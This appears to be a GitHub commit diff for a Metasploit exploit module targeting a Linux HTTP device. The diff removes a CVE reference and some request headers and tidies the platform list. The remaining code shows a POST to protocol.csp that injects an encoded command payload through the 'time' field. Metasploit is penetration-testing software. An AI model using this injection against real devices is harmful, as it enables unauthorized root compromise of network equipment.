File tree Expand file tree Collapse file tree 1 file changed +2
-8
lines changed
modules/exploits/linux/http Expand file tree Collapse file tree 1 file changed +2
-8
lines changed Original file line number Diff line number Diff line change @@ -29,10 +29,9 @@ def initialize(info = {})
29
29
] ,
30
30
'License' => MSF_LICENSE ,
31
31
'References' => [
32
- [ 'URL' , 'https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/' ] ,
33
- [ 'CVE' , '2025-34152' ]
32
+ [ 'URL' , 'https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/' ]
34
33
] ,
35
- 'Platform' => %( linux unix) ,
34
+ 'Platform' => [ ' linux' , ' unix' ] ,
36
35
'Arch' => [ ARCH_CMD , ARCH_MIPSBE ] ,
37
36
'Targets' => [
38
37
[
@@ -122,11 +121,6 @@ def exploit
122
121
send_request_cgi (
123
122
'method' => 'POST' ,
124
123
'uri' => normalize_uri ( target_uri . path , 'protocol.csp?' ) ,
125
- 'headers' => {
126
- 'Origin' => "http://#{ rhost } " ,
127
- 'Referer' => "http://#{ rhost } /network.html" ,
128
- 'X-Requested-With' => 'XMLHttpRequest'
129
- } ,
130
124
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8' ,
131
125
'data' => "fname=system&opt=time_conf&function=set&time=#{ encoded_payload } "
132
126
)
You can’t perform that action at this time.
0 commit comments